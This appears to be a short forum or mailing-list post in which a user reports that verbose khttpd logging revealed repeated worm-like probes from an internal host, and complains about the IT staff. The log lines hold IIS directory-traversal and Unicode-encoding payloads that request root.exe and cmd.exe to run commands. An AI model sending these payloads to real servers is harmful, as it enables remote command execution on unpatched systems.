Never mind, found the problem after turning on verbrose HTTP reporting:
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/root.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/MSADC/root.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/c/winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/d/winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir"
khttpd: 16.112.144.31 connection from 16.112.147.66
khttpd: GET "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir"
*sigh*, time to call the IM guys again and tell them to do their jobs.
Previous Topic
Index
